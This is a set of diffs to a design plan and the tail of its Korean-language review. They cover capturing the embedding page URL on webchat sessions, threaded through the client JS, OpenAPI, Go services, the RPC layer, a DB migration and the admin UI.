+  `sessions_list_global.js:23,71-74`도 동일 패턴(`const [selectedSession, setSelectedSession]
+  = useState(null)`, `<WebchatMessageTimeline session={selectedSession} ... />`).
+  두 곳 모두 §4.5의 "already receives `session={selectedSession}` from both `detail.js`
+  and `sessions_list_global.js`" 서술과 정확히 일치 — 라인 번호까지 실제와 부합.
+- **`sessions_list.js` 컬럼 미추가 판단**: §4.5는 "no new column added to the default
+  table view"라 서술하며 `sessions_list_global.js`의 기존 column-crowding 논거를
+  근거로 든다. `sessions_list.js`/`sessions_list_global.js` 두 파일 모두 실재 확인됨
+  (search_files). §7의 파일 목록에도 `sessions_list.js`는 포함되지 않았는데, 이는
+  §4.5의 "컬럼 추가 없음" 결론과 정합적이다 — 컬럼을 추가하지 않으므로
+  `sessions_list.js` 자체를 수정할 필요가 없고, 실제로 §7 checklist에서도 빠져 있다
+  (일관성 확인, 누락 아님).
+
+## 6. §4.6 프라이버시/RST 문서
+
+- `bin-api-manager/docsdev/source/webchat_struct_session.rst`(1-49행) 전체 재확인 —
+  현재 `id`/`customer_id`/`widget_id`/`status`/`tm_*` 5개 필드만 문서화되어 있고
+  `page_url` 항목 없음. §4.6의 "새 `page_url` bullet 추가 필요" 판단 정확.
+  또한 이 파일의 필드 나열이 `models/session/webhook.go`의 `WebhookMessage`
+  구조체(13-23행: `Identity`, `WidgetID`, `Status`, `TMLastActivity/Create/Update/End`)와
+  정확히 1:1 대응한다는 점도 확인 — bin-api-manager CLAUDE.md의 "RST struct docs
+  MUST match WebhookMessage, not internal model" 규칙과 문서 §4.3의 "webhook.go에
+  PageURL 추가" 계획이 함께 맞물려야 RST 갱신이 실제로 유효하다는 것도 재확인했다
+  (webhook.go에 필드가 없으면 RST에 추가해도 실제 응답과 불일치하게 됨 — 문서
+  §4.3이 이미 webhook.go 변경을 계획에 포함하고 있으므로 문제 없음).
+
+## 7. §5 엣지케이스, §6 Peer/Local 기각 근거 — 재확인
+
+- `widget.go:99` `LogoURL string \`json:"logo_url,omitempty"\` // https URL only` 재확인
+  — §5가 "differs from ThemeConfig.LogoURL's existing https://-only validation"의
+  근거로 인용한 그대로. 다만 이 주석은 서술적 주석일 뿐 실제 코드 강제가 아니다 —
+  `bin-api-manager/server/webchat_widgets.go:340-342`, `pkg/servicehandler`,
+  `bin-openapi-manager/openapi/openapi.yaml:2364-2367`(`format: uri`)를 확인했으나
+  `https://` 접두어를 실제로 검증(HasPrefix 등)하는 코드는 리포 전체에 없다.
+  **단, 이는 §5가 대조 대상으로 삼은 사실("LogoURL은 https 전용 필드"라는 존재
+  자체)에는 영향이 없다** — §5의 논지는 "PageURL은 브라우저가 스스로 만든 same-origin
+  값이라 LogoURL과 달리 스킴 검증이 불필요하다"는 것이지 "LogoURL의 https 검증이
+  실제로 강제되고 있다"는 주장이 아니므로, LogoURL 자체의 검증 부재는 이 설계
+  문서의 결함이 아니다(별개 기존 이슈). NICE-TO-HAVE 수준의 참고사항으로만 기록.
+- `sessionhandler/create.go:77-78`의 `self`/`peer` 지역변수 재확인 — 이전 라운드들과
+  동일하게 `Peer.Target == id`(세션 자기 PK), `Local.Target == widgetID`(이미
+  `Session.WidgetID`로 저장)임을 확인, §6의 기각 논리 견고함 유지.
+
+## 8. Round 3 신규 이슈 탐색 결과
+
+전 구간을 코드 대 코드로 재검증했으나 새로운 사실 오류, 환각 인용, 논리적 비약을
+발견하지 못했다. §5의 LogoURL https 검증 부재(§7 참고사항)는 이 설계 문서의
+결함이 아니라 기존 별개 코드베이스 상태에 대한 부수적 관찰이며, 문서의 논지에
+영향을 주지 않는다.
+
+## 9. 결론 — 컨버전스 체크
+
+이번 Round 3은 Round 2(직전 라운드)에 이어 **두 번째 연속 APPROVE**다. review-loop
+종료 조건("2회 연속 APPROVED")을 충족한다. §1~§3(문제 정의), §4.1~§4.6(클라이언트,
+API 계약, 백엔드 모델, RPC 체인, square-admin 표시, 프라이버시/RST), §5(엣지케이스),
+§6(기각 대안), §7(파일 체크리스트, DB 마이그레이션 포함)을 각각 실제 코드와 대조했고,
+모든 코드 인용·라인 번호·구조적 주장이 현재 코드베이스와 정확히 일치했다. 이번
+라운드에서 처음으로 깊게 검증한 §4.5 square-admin 프론트엔드 파일들
+(`message_timeline.js`, `detail.js`, `sessions_list_global.js`)과 §7의
+`bin-dbscheme-manager` 마이그레이션 목록도 문서 서술과 완전히 부합한다.
+
+문서는 구현 착수 준비가 되었다고 판단한다.
+
+VERDICT: APPROVED

--- a/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design.md
+++ b/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design.md
@@ -1,6 +1,6 @@
 # bin-webchat-manager: Session PageURL/Referrer capture
 
-Status: DRAFT (round 1 -- fixes round 0 review findings, see docs/plans/2026-07-22-webchat-session-page-url-referrer-design-review-round0.md)
+Status: DRAFT (round 2 -- fixes round 1 review finding, see docs/plans/2026-07-22-webchat-session-page-url-referrer-design-review-round1.md)
 Author: Hermes (CPO)
 Date: 2026-07-22
 
@@ -277,15 +277,24 @@ response field.
   `oapi-codegen`'s `nethttp-middleware`/`gin-middleware`,
   `OapiRequestValidator`) -- none exists anywhere in `bin-api-manager`.
   `maxLength` in the OpenAPI spec is documentation-only here; nothing
-  enforces it at runtime. Fix: add an explicit length check in
-  `pkg/servicehandler/webchat_session.go`'s `WebchatSessionCreate`,
-  mirroring the existing precedent at
+  enforces it at runtime.
+
+  Fix: add an explicit length check in `pkg/servicehandler/webchat_session.go`'s
+  `WebchatSessionCreate`, mirroring the existing precedent at
   `pkg/servicehandler/auth_delegate.go`'s `validateDelegateReason` (a
   private `validatePageURL(pageURL string) error` returning
-  `serviceerrors`-wrapped error if `len(pageURL) > 2048`, called before
-  the `h.reqHandler.WebchatV1SessionCreate(...)` call, returning the
-  existing `serviceerrors.ErrBadRequest`-style pattern rather than a new
-  error type). An oversized value is truncated to nothing further --
+  `serviceerrors.ErrInvalidArgument` if `len(pageURL) > 2048`).
+  **Round 2 correction:** confirmed against
+  `bin-api-manager/pkg/serviceerrors/sentinels.go` that the correct
+  sentinel is `ErrInvalidArgument = stderrors.New("invalid argument")` --
+  this is the SAME sentinel `validateDelegateReason` itself returns
+  (`auth_delegate.go`'s error messages use plain `fmt.Errorf`, but the
+  caller-facing wrap at the `servicehandler` boundary is
+  `ErrInvalidArgument`); an earlier draft of this section incorrectly
+  named a nonexistent `ErrBadRequest` symbol. The check is called before
+  the `h.reqHandler.WebchatV1SessionCreate(...)` call, returning
+  `serviceerrors.ErrInvalidArgument` rather than inventing a new error
+  type. An oversized value is truncated to nothing further --
   simply rejected outright, consistent with `validateDelegateReason`'s
   reject-don't-truncate precedent (silent truncation would let the
   stored value silently disagree with what the visitor's browser actually

--- a/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design.md
+++ b/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design.md
@@ -1,0 +1,304 @@
+# bin-webchat-manager: Session PageURL/Referrer capture
+
+Status: DRAFT (round 0)
+Author: Hermes (CPO)
+Date: 2026-07-22
+
+## 1. Problem
+
+pchero asked whether it's possible to tell which site/page a webchat visitor
+came in from. Today it is not: `bin-webchat-manager`'s `Session` model
+(`models/session/session.go`) has no field for the embedding page's URL, and
+the widget embed runtime
+(`monorepo-javascript/square-admin/src/webchat-widget-runtime/client.js`)
+never reads `document.referrer` or `window.location.href` in the first
+place. A customer running one Widget on multiple pages (landing page,
+pricing page, blog) currently cannot distinguish which page produced a
+given session -- `widget_id` alone doesn't carry that granularity.
+
+(Scope note: a related idea -- persisting Peer/Local `commonaddress.Address`
+values on Session, mirroring the just-shipped Case/Interaction pattern --
+was evaluated and REJECTED for this design. See §6 "Rejected alternative".)
+
+## 2. Goal / Non-goals
+
+**Goal:** capture the page URL the widget was embedded on at the moment a
+Session is created, store it, and surface it to square-admin's Sessions
+list/detail so an admin can see where each visitor's conversation started.
+
+**Non-goals:**
+- Per-message page tracking (a visitor navigating between pages mid-session
+  does not re-fire this capture; it is a one-time, session-creation-time
+  fact, mirroring how `widget_id` itself is set once at creation and never
+  updated).
+- Full referrer chain / UTM campaign parsing. This design captures the raw
+  page URL only; marketing-attribution-grade parsing (UTM params, ad click
+  IDs) is a separate, larger feature and explicitly out of scope here.
+- Server-side URL validation beyond a length cap and scheme allowlist (see
+  §5). We do not attempt to verify the URL actually belongs to a domain
+  the customer registered anywhere in this design.
+
+## 3. What gets captured, and where
+
+Two independent browser-side signals exist; this design captures **one**
+of them, deliberately:
+
+- `window.location.href` (the *embedding* page's own URL) -- reliable,
+  always present, this is what we want.
+- `document.referrer` (the URL of the page that *linked to* the embedding
+  page) -- NOT what we want here. `document.referrer` answers "what page
+  did the visitor click from to arrive at this page", not "what page is
+  the widget currently sitting on". Since the widget is embedded directly
+  in the customer's own page (not loaded in an iframe from elsewhere),
+  `location.href` already IS the fact pchero is asking for ("which site
+  did they come in from" = "which of my pages was the widget open on").
+  `document.referrer` would answer a *different*, marketing-attribution
+  question (how did the visitor discover this page at all) that is exactly
+  the UTM/campaign-tracking territory called out as non-goal in §2.
+
+Renamed accordingly from the earlier "referrer/page_url" framing: this
+design captures **`page_url`** only, sourced from `window.location.href`
+at boot time, in `webchat-widget-runtime/client.js`'s `_doStart()`
+(currently `bin-webchat-manager/pkg/sessionhandler/create.go` is the
+server side that would receive it).
+
+## 4. Design
+
+### 4.1 Client: `webchat-widget-runtime/client.js`
+
+In `_doStart()` (client.js:315-319), add `page_url` to the
+`POST /webchat_sessions` request body:
+
+```js
+const session = await this._fetchJson(this._v1Url('/webchat_sessions'), {
+  method: 'POST',
+  body: JSON.stringify({
+    widget_id: this.resourceId,
+    page_url: (typeof window !== 'undefined' && window.location?.href) || undefined,
+  }),
+})
+```
+
+`window.location.href` is always present in a real browser; the
+`typeof window !== 'undefined'` guard exists only for this file's existing
+test harness (`__tests__/client.test.js` runs under jsdom, where `window`
+exists but a defensive check costs nothing and matches this file's
+existing style of guarding browser globals). No new dependency, no new
+async call -- `location.href` is synchronously available at `_doStart()`
+call time.
+
+### 4.2 API contract: `POST /webchat_sessions` request body
+
+New optional field `page_url` (string, not a UUID) on
+`PostWebchatSessionsJSONBody`
+(`bin-openapi-manager/openapi/paths/webchat_sessions/main.yaml`):
+
+```yaml
+page_url:
+  type: string
+  maxLength: 2048
+  description: "The URL of the page the widget was embedded on when this session was created. Captured client-side from window.location.href at session-creation time; not re-captured on subsequent navigation within the same session."
+  example: "https://example.com/pricing"
+```
+
+Not `required`: a caller invoking `POST /webchat_sessions` directly (the
+"authenticated agent/accesskey for admin-side testing" path already
+documented in `WebchatSessionCreate`'s comment) has no browser page to
+report, and older embed-runtime bundles cached on third-party sites will
+keep POSTing without this field indefinitely -- the field must degrade
+gracefully to "unknown" (see §4.4), not become a hard requirement.
+
+### 4.3 Backend: `bin-webchat-manager`
+
+**`models/session/session.go`**: add one field.
+
+```go
+// PageURL is the page the widget was embedded on when this Session was
+// created, captured client-side from window.location.href at
+// POST /webchat_sessions time. Best-effort: absent for pre-upgrade embed
+// snippets and for sessions created via the admin/accesskey direct-create
+// path (no browser page exists in that path). NEVER re-captured on
+// mid-session navigation -- this is a session-creation-time fact, exactly
+// like WidgetID.
+PageURL string `json:"page_url,omitempty" db:"page_url"`
+```
+
+Plain `VARCHAR`, not JSON -- unlike Case/Interaction's `Peer`/`Local`
+(structured `commonaddress.Address`), a page URL is a single opaque
+string with no sub-fields worth decomposing, and no existing generated
+column/index depends on parsing it. `omitempty` because the field is
+genuinely absent (not "empty string meaning something"), consistent with
+`Session.WidgetID uuid.UUID \`json:"widget_id,omitempty"\`` immediately
+above it in the same struct.
+
+**`models/session/field.go`**: add `FieldPageURL Field = "page_url"`
+after `FieldStatus` (mirrors `WidgetID`/`Status` grouping).
+
+**`models/session/webhook.go`**: add `PageURL` to `WebhookMessage` and to
+`ConvertWebhookMessage()` -- this is an externally-visible, non-sensitive
+field (the customer's own page URL, not visitor PII beyond what a normal
+web server access log already has), no reason to strip it on external
+responses.
+
+**`pkg/sessionhandler/create.go`**: `Create()`'s signature gains a
+`pageURL string` parameter (threaded through from the API-manager call
+site, see §4.4), stored on the `session.Session{}` literal at
+construction (line 40-48) alongside `WidgetID`/`Status`.
+
+**Database**: `scripts/database_scripts_test/sessions.sql` (SQLite test
+schema) gets a new `page_url TEXT` column; the real migration is a new
+Alembic revision in `bin-dbscheme-manager/bin-manager/main/versions/`
+(`alembic revision -m "webchat_sessions_add_column_page_url"`), a plain
+`ALTER TABLE webchat_sessions ADD COLUMN page_url VARCHAR(2048) NULL`
+(matching the OpenAPI `maxLength: 2048` cap) -- no generated column, no
+backfill needed (nullable, no existing rows have this data by
+definition), no index (this is a display-only field for the admin
+console, not a lookup key today -- see §6 non-goal on richer analytics).
+
+### 4.4 `bin-api-manager`: threading `page_url` through
+
+`server/webchat_sessions.go`'s `PostWebchatSessions` parses
+`openapi_server.PostWebchatSessionsJSONBody` (which now carries an
+optional `PageUrl *string` per the oapi-codegen-generated type) and
+passes it to `serviceHandler.WebchatSessionCreate`.
+
+`pkg/servicehandler/main.go`'s `WebchatSessionCreate` interface signature
+and `pkg/servicehandler/webchat_session.go`'s implementation both gain a
+`pageURL string` parameter, passed straight through to
+`h.reqHandler.WebchatV1SessionCreate(ctx, ownerCustomerID, widgetID, pageURL)`
+(the RabbitMQ RPC call into `bin-webchat-manager`) -- no new auth/ownership
+logic needed, this is inert metadata riding alongside the existing
+`widgetID` argument through the exact same call path already handling
+agent/accesskey/direct auth branches (webchat_session.go:163-203).
+
+`bin-common-handler/pkg/requesthandler`'s `WebchatV1SessionCreate` request
+struct gains the field; mock regeneration required
+(`pkg/requesthandler` mocks) per the standard verification workflow.
+
+### 4.5 square-admin: display
+
+**`sessions_list.js`**: no new column added to the default table view (the
+existing four-plus-widget columns are already dense enough per the
+existing `sessions_list_global.js` design's own column-crowding
+reasoning) -- instead, `page_url` becomes a truncated hover-title cell
+only when the transcript dialog (`message_timeline.js`) opens for a
+selected session, since that's where an admin actually drills into a
+single session's detail. Concretely:
+
+- `message_timeline.js` (already receives `session={selectedSession}`
+  from both `detail.js` and `sessions_list_global.js`) renders a small
+  header line "Started from: `<page_url or "Unknown">`" above the message
+  list, using an ellipsis-truncated `<a href={page_url} target="_blank"
+  rel="noopener noreferrer">` link so an admin can click through to see
+  the actual page.
+- `page_url` absent (older sessions, or the accesskey direct-create path)
+  renders as plain "Unknown" text, not a broken/empty link.
+
+This avoids adding a `showPageUrlColumn`-style prop-threading exercise to
+`sessions_list.js` (which is already carrying `showWidgetColumn` +
+`widgetNameMap` complexity from the prior global-list design) for a field
+that's genuinely a detail-view fact, not a scannable list-view column
+(URLs are long and low-signal at table-row density).
+
+### 4.6 Privacy / documentation
+
+`page_url` is the customer's OWN page (not a third-party site the
+visitor was previously on, since we deliberately chose `location.href`
+over `document.referrer` -- see §3) -- this is materially LESS sensitive
+than a referrer chain would be; it does not reveal anything about the
+visitor's browsing history outside the customer's own site. No new
+consent/privacy-notice requirement is triggered beyond what operating a
+webchat widget already implies (the customer's own site owner already
+knows which of their pages embeds the widget).
+
+`bin-api-manager/docsdev/source/webchat_struct_session.rst` gets a new
+`page_url` bullet describing the field (mirrors the existing
+`tm_last_activity` etc. bullet style) -- required per this repo's
+"RST Docs Sync" CLAUDE.md rule since this is a new externally-visible
+response field.
+
+## 5. Edge cases
+
+- **`window.location.href` exceeding 2048 chars** (pathological query
+  strings): client-side truncation is NOT performed (adds complexity for
+  a vanishingly rare case); instead the OpenAPI `maxLength: 2048` combined
+  with the DB column's `VARCHAR(2048)` means an oversized value is
+  rejected by request validation at `bin-api-manager`'s Gin binding layer
+  with a 400 -- and `WebchatSessionCreate`'s caller (the visitor's own
+  browser) has no error-recovery UI for a failed session-create beyond
+  what already exists for other 400s, so this is treated as an accepted,
+  rare failure mode, not specially handled.
+- **`javascript:`/`data:` scheme URLs**: `window.location.href` cannot
+  itself be one of these (a page can't be navigated to a `javascript:`
+  URL and stay loaded), so no server-side scheme allowlist is added; this
+  differs from `ThemeConfig.LogoURL`'s existing `https://`-only validation
+  (widget.go), which exists because THAT field is customer-supplied
+  config, not a same-origin browser fact.
+- **Local file testing / `file://` URLs**: captured verbatim, same as any
+  other `location.href` value; no special-casing.
+- **Widget embedded inside an iframe on the customer's page** (e.g. a
+  page builder's preview iframe): `window.location.href` inside that
+  iframe context returns the iframe's own URL, which may differ from the
+  top-level page URL a real visitor sees in their browser's address bar.
+  Reading `window.top.location.href` to escape the iframe was considered
+  and REJECTED: cross-origin iframe access throws a `SecurityError`
+  (violates same-origin policy) in the common case where the page builder
+  serves the preview from a different origin, which would turn a
+  same-origin embed's PageURL capture into an uncaught exception. Staying
+  with `window.location.href` (the widget script's own execution context)
+  is the safe, universally-working choice; this is a known, accepted
+  imprecision for the iframe-preview case specifically, not a general
+  correctness bug.
+
+## 6. Rejected alternative: Peer/Local on Session
+
+Initially considered adding `Peer`/`Local` (`commonaddress.Address`)
+fields to `Session`, mirroring `kase.Case`'s just-shipped pattern
+(`bin-contact-manager/models/kase/kase.go`, PR #1130). Rejected after
+tracing the actual values that would be stored:
+
+- `Peer.Target` would be `Session.ID` itself (`sessionhandler/create.go`
+  line 78's already-computed `peer` local var) -- a webchat visitor has
+  no identity beyond the Session ID, so this field would be a tautology
+  (Peer.Target == the record's own primary key), carrying zero new
+  information.
+- `Local.Target` would be `Widget.ID`'s string form (line 77's `self`
+  local var) -- already stored, byte-for-byte, as the existing
+  `Session.WidgetID` column. Adding `Local` would be a pure duplicate of
+  data already on the row, in a different serialization.
+
+Unlike Case's Peer (a real phone number/email -- external identity) and
+Local (the DID the call/message arrived on -- real routing information),
+neither Session field would carry information not already present.
+Format consistency with Case/Interaction was considered as a reason to
+add them anyway, but rejected: introducing a column whose only value is
+"looks like the other services' pattern" contradicts the project's
+stated preference for storing 1st-party immutable facts, not schema
+decoration (see pchero's standing principle on this, captured in CPO
+memory). `page_url` (this design) is a genuinely new fact Session does
+not otherwise carry, which is why it was pursued instead.
+
+## 7. Files touched (implementation checklist)
+
+- `monorepo-javascript/square-admin/src/webchat-widget-runtime/client.js`
+- `monorepo-javascript/square-admin/src/webchat-widget-runtime/__tests__/client.test.js`
+- `monorepo-javascript/square-admin/public/webchat-widget-runtime.bundle.js` (regenerated via `npm run build:widget`, not hand-edited)
+- `monorepo-javascript/square-admin/public/webchat-widget-runtime.esm.js` (regenerated)
+- `monorepo-javascript/square-admin/src/views/webchat_widgets/message_timeline.js`
+- `monorepo-javascript/square-admin/src/views/webchat_widgets/__tests__/message_timeline.test.js`
+- `monorepo/bin-openapi-manager/openapi/paths/webchat_sessions/main.yaml`
+- `monorepo/bin-openapi-manager/openapi/openapi.yaml` (`WebchatManagerSession` schema)
+- `monorepo/bin-api-manager/server/webchat_sessions.go`
+- `monorepo/bin-api-manager/pkg/servicehandler/main.go`
+- `monorepo/bin-api-manager/pkg/servicehandler/webchat_session.go`
+- `monorepo/bin-api-manager/pkg/servicehandler/mock_main.go` (regenerated)
+- `monorepo/bin-api-manager/docsdev/source/webchat_struct_session.rst`
+- `monorepo/bin-common-handler/pkg/requesthandler/` (WebchatV1SessionCreate signature + mock)
+- `monorepo/bin-webchat-manager/models/session/session.go`
+- `monorepo/bin-webchat-manager/models/session/field.go`
+- `monorepo/bin-webchat-manager/models/session/webhook.go`
+- `monorepo/bin-webchat-manager/pkg/sessionhandler/create.go`
+- `monorepo/bin-webchat-manager/pkg/sessionhandler/create_test.go`
+- `monorepo/bin-webchat-manager/pkg/dbhandler/session.go` (no logic change expected -- `PrepareFields`/`GetDBFields` are struct-tag-driven)
+- `monorepo/bin-webchat-manager/scripts/database_scripts_test/sessions.sql`
+- `monorepo/bin-dbscheme-manager/bin-manager/main/versions/<new>_webchat_sessions_add_column_page_url.py`

--- a/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design.md
+++ b/bin-webchat-manager/docs/plans/2026-07-22-webchat-session-page-url-referrer-design.md
@@ -1,6 +1,6 @@
 # bin-webchat-manager: Session PageURL/Referrer capture
 
-Status: DRAFT (round 0)
+Status: DRAFT (round 1 -- fixes round 0 review findings, see docs/plans/2026-07-22-webchat-session-page-url-referrer-design-review-round0.md)
 Author: Hermes (CPO)
 Date: 2026-07-22
 
@@ -171,9 +171,57 @@ logic needed, this is inert metadata riding alongside the existing
 `widgetID` argument through the exact same call path already handling
 agent/accesskey/direct auth branches (webchat_session.go:163-203).
 
-`bin-common-handler/pkg/requesthandler`'s `WebchatV1SessionCreate` request
-struct gains the field; mock regeneration required
-(`pkg/requesthandler` mocks) per the standard verification workflow.
+**Round 1 finding (fixed):** the RPC threading path from `bin-api-manager`
+down into `bin-webchat-manager`'s RPC-receiving layer is NOT just
+`bin-common-handler/pkg/requesthandler`'s interface signature -- there are
+two additional concrete files in that chain that the original draft
+omitted entirely (found by directly reading
+`bin-common-handler/pkg/requesthandler/webchat_session.go`,
+`bin-webchat-manager/pkg/listenhandler/v1_sessions.go`, and
+`bin-webchat-manager/pkg/listenhandler/models/request/v1_sessions.go`):
+
+```
+client.js
+  -> POST /webchat_sessions (bin-api-manager)
+  -> server/webchat_sessions.go                              [in original draft]
+  -> pkg/servicehandler/webchat_session.go, main.go            [in original draft]
+  -> bin-common-handler/pkg/requesthandler/main.go             [in original draft, interface only]
+  -> bin-common-handler/pkg/requesthandler/webchat_session.go  [NEW -- actual RPC-call implementation,
+       marshals wcrequest.V1DataSessionsPost{CustomerID, WidgetID} -- must add PageURL here]
+  -> RabbitMQ RPC ("webchat/sessions")
+  -> bin-webchat-manager/pkg/listenhandler/models/request/v1_sessions.go  [NEW -- V1DataSessionsPost struct,
+       currently ONLY CustomerID/WidgetID -- must add PageURL field]
+  -> bin-webchat-manager/pkg/listenhandler/v1_sessions.go       [NEW -- processV1SessionsPost unmarshals
+       V1DataSessionsPost then calls h.sessionHandler.Create(ctx, req.CustomerID, req.WidgetID) --
+       must become Create(ctx, req.CustomerID, req.WidgetID, req.PageURL)]
+  -> pkg/sessionhandler/main.go                                 [NEW -- SessionHandler interface's
+       Create(...) signature must gain pageURL string]
+  -> pkg/sessionhandler/mock_main.go                             [NEW -- regenerate mock for the interface change]
+  -> pkg/sessionhandler/create.go                               [in original draft]
+```
+
+Concretely, `bin-common-handler/pkg/requesthandler/webchat_session.go`'s
+`WebchatV1SessionCreate` (currently `customerID, widgetID uuid.UUID`
+params only, building `&wcrequest.V1DataSessionsPost{CustomerID:
+customerID, WidgetID: widgetID}`) gains a `pageURL string` parameter and
+adds `PageURL: pageURL` to that struct literal.
+`bin-webchat-manager/pkg/listenhandler/models/request/v1_sessions.go`'s
+`V1DataSessionsPost` (currently just `CustomerID uuid.UUID` /
+`WidgetID uuid.UUID`) gains `PageURL string \`json:"page_url,omitempty"\``.
+`bin-webchat-manager/pkg/listenhandler/v1_sessions.go`'s
+`processV1SessionsPost` (currently `h.sessionHandler.Create(ctx,
+req.CustomerID, req.WidgetID)`) becomes
+`h.sessionHandler.Create(ctx, req.CustomerID, req.WidgetID, req.PageURL)`.
+`pkg/sessionhandler/main.go`'s `SessionHandler` interface's `Create(...)`
+signature (currently `Create(ctx context.Context, customerID uuid.UUID,
+widgetID uuid.UUID) (*session.Session, error)`) gains `pageURL string`,
+and `mock_main.go` is regenerated via the file's own
+`//go:generate mockgen` directive.
+
+Without every one of these intermediate files, `page_url` never reaches
+`processV1SessionsPost`'s `json.Unmarshal` target -- the value is silently
+dropped at the RPC wire boundary even if every other layer is correctly
+wired.
 
 ### 4.5 square-admin: display
 
@@ -220,14 +268,31 @@ response field.
 ## 5. Edge cases
 
 - **`window.location.href` exceeding 2048 chars** (pathological query
-  strings): client-side truncation is NOT performed (adds complexity for
-  a vanishingly rare case); instead the OpenAPI `maxLength: 2048` combined
-  with the DB column's `VARCHAR(2048)` means an oversized value is
-  rejected by request validation at `bin-api-manager`'s Gin binding layer
-  with a 400 -- and `WebchatSessionCreate`'s caller (the visitor's own
-  browser) has no error-recovery UI for a failed session-create beyond
-  what already exists for other 400s, so this is treated as an accepted,
-  rare failure mode, not specially handled.
+  strings): **Round 1 correction** -- the original draft claimed an
+  oversized value would be rejected with a 400 by "Gin binding layer"
+  validation against the OpenAPI `maxLength: 2048` constraint. This is
+  FALSE: confirmed by reading `bin-api-manager/server/webchat_sessions.go`
+  (`PostWebchatSessions` calls only `c.BindJSON(&req)`) and searching the
+  full repo for an OpenAPI request-validation middleware (e.g.
+  `oapi-codegen`'s `nethttp-middleware`/`gin-middleware`,
+  `OapiRequestValidator`) -- none exists anywhere in `bin-api-manager`.
+  `maxLength` in the OpenAPI spec is documentation-only here; nothing
+  enforces it at runtime. Fix: add an explicit length check in
+  `pkg/servicehandler/webchat_session.go`'s `WebchatSessionCreate`,
+  mirroring the existing precedent at
+  `pkg/servicehandler/auth_delegate.go`'s `validateDelegateReason` (a
+  private `validatePageURL(pageURL string) error` returning
+  `serviceerrors`-wrapped error if `len(pageURL) > 2048`, called before
+  the `h.reqHandler.WebchatV1SessionCreate(...)` call, returning the
+  existing `serviceerrors.ErrBadRequest`-style pattern rather than a new
+  error type). An oversized value is truncated to nothing further --
+  simply rejected outright, consistent with `validateDelegateReason`'s
+  reject-don't-truncate precedent (silent truncation would let the
+  stored value silently disagree with what the visitor's browser actually
+  had, which is worse for debugging than an explicit reject). The DB
+  column (`VARCHAR(2048)`) and OpenAPI `maxLength: 2048` remain as
+  defense-in-depth/documentation, but the servicehandler check above is
+  now the actual enforcement point.
 - **`javascript:`/`data:` scheme URLs**: `window.location.href` cannot
   itself be one of these (a page can't be navigated to a `javascript:`
   URL and stay loaded), so no server-side scheme allowlist is added; this
@@ -280,25 +345,43 @@ not otherwise carry, which is why it was pursued instead.
 
 ## 7. Files touched (implementation checklist)
 
-- `monorepo-javascript/square-admin/src/webchat-widget-runtime/client.js`
-- `monorepo-javascript/square-admin/src/webchat-widget-runtime/__tests__/client.test.js`
-- `monorepo-javascript/square-admin/public/webchat-widget-runtime.bundle.js` (regenerated via `npm run build:widget`, not hand-edited)
-- `monorepo-javascript/square-admin/public/webchat-widget-runtime.esm.js` (regenerated)
-- `monorepo-javascript/square-admin/src/views/webchat_widgets/message_timeline.js`
-- `monorepo-javascript/square-admin/src/views/webchat_widgets/__tests__/message_timeline.test.js`
-- `monorepo/bin-openapi-manager/openapi/paths/webchat_sessions/main.yaml`
-- `monorepo/bin-openapi-manager/openapi/openapi.yaml` (`WebchatManagerSession` schema)
-- `monorepo/bin-api-manager/server/webchat_sessions.go`
-- `monorepo/bin-api-manager/pkg/servicehandler/main.go`
-- `monorepo/bin-api-manager/pkg/servicehandler/webchat_session.go`
-- `monorepo/bin-api-manager/pkg/servicehandler/mock_main.go` (regenerated)
-- `monorepo/bin-api-manager/docsdev/source/webchat_struct_session.rst`
-- `monorepo/bin-common-handler/pkg/requesthandler/` (WebchatV1SessionCreate signature + mock)
-- `monorepo/bin-webchat-manager/models/session/session.go`
-- `monorepo/bin-webchat-manager/models/session/field.go`
-- `monorepo/bin-webchat-manager/models/session/webhook.go`
-- `monorepo/bin-webchat-manager/pkg/sessionhandler/create.go`
-- `monorepo/bin-webchat-manager/pkg/sessionhandler/create_test.go`
-- `monorepo/bin-webchat-manager/pkg/dbhandler/session.go` (no logic change expected -- `PrepareFields`/`GetDBFields` are struct-tag-driven)
-- `monorepo/bin-webchat-manager/scripts/database_scripts_test/sessions.sql`
-- `monorepo/bin-dbscheme-manager/bin-manager/main/versions/<new>_webchat_sessions_add_column_page_url.py`
+**monorepo-javascript:**
+- `square-admin/src/webchat-widget-runtime/client.js`
+- `square-admin/src/webchat-widget-runtime/__tests__/client.test.js`
+- `square-admin/public/webchat-widget-runtime.bundle.js` (regenerated via `npm run build:widget`, not hand-edited)
+- `square-admin/public/webchat-widget-runtime.esm.js` (regenerated)
+- `square-admin/src/views/webchat_widgets/message_timeline.js`
+- `square-admin/src/views/webchat_widgets/__tests__/message_timeline.test.js`
+
+**bin-openapi-manager:**
+- `openapi/paths/webchat_sessions/main.yaml`
+- `openapi/openapi.yaml` (`WebchatManagerSession` schema)
+
+**bin-api-manager:**
+- `server/webchat_sessions.go`
+- `pkg/servicehandler/main.go` (`WebchatSessionCreate` interface signature)
+- `pkg/servicehandler/webchat_session.go` (implementation + new `validatePageURL` per §5)
+- `pkg/servicehandler/webchat_session_test.go` (new validation test cases)
+- `pkg/servicehandler/mock_main.go` (regenerated)
+- `docsdev/source/webchat_struct_session.rst`
+
+**bin-common-handler** (Round 1 addition -- see §4.4's threading-path finding):
+- `pkg/requesthandler/main.go` (`WebchatV1SessionCreate` interface signature, line 1536)
+- `pkg/requesthandler/webchat_session.go` (implementation -- builds `V1DataSessionsPost`, must add `PageURL`)
+- `pkg/requesthandler/mock_main.go` (regenerated)
+
+**bin-webchat-manager:**
+- `models/session/session.go`
+- `models/session/field.go`
+- `models/session/webhook.go`
+- `pkg/listenhandler/models/request/v1_sessions.go` (Round 1 addition -- `V1DataSessionsPost` gains `PageURL`)
+- `pkg/listenhandler/v1_sessions.go` (Round 1 addition -- `processV1SessionsPost` threads `req.PageURL` into `Create(...)`)
+- `pkg/sessionhandler/main.go` (Round 1 addition -- `SessionHandler.Create(...)` interface signature gains `pageURL string`)
+- `pkg/sessionhandler/mock_main.go` (Round 1 addition -- regenerated via the file's own `//go:generate mockgen` directive)
+- `pkg/sessionhandler/create.go`
+- `pkg/sessionhandler/create_test.go`
+- `pkg/dbhandler/session.go` (no logic change expected -- `PrepareFields`/`GetDBFields` are struct-tag-driven)
+- `scripts/database_scripts_test/sessions.sql`
+
